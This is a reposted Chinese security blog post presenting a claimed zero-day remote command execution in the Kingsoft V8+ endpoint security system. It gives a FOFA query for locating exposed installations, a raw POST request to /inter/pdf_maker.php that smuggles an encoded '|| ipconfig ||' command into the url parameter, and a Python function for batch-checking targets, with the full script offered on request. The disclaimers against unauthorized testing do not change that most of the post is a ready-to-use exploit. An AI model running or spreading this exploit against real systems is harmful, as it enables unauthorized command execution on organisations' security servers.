hvv-0day 金山V8RCE

  • A+
所属分类:安全文章

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!


FOFA语法:

app="猎鹰安全-金山V8+终端安全系统"


POC:

POST /inter/pdf_maker.php HTTP/1.1Host: xxxxxxxxxContent-Length: 45Pragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer:Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6Cookie: PHPSESSID=750mnuf7f29e6dpsrp27r2p7o6Upgrade-Insecure-Requests: 1
url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx

url处为url编码的命令" || ipconfig ||


脚本使用:

支持批量检测、单个利用、单个检测!

def  poc(url):  print('-'*50)  header ={  'Content-Type': 'application/x-www-form-urlencoded',  }  target = url +"/inter/pdf_maker.php"  data = "url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx"  r = requests.post(url=target,data=data,headers=header,timeout=8,verify=False)  if r.status_code ==200 and "Windows" in r.text:    print(url+"  漏洞存在!")  else:    print(url+"  漏洞不存在!")  print('-'*50)


脚本截图:

hvv-0day 金山V8RCE

hvv-0day 金山V8RCE

后台回复:金山RCE 获取脚本!


切勿用于非法测试!

切勿用于非法测试

切勿用于非法测试!

本文始发于微信公众号(Fight Tigers Team):hvv-0day 金山V8RCE

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: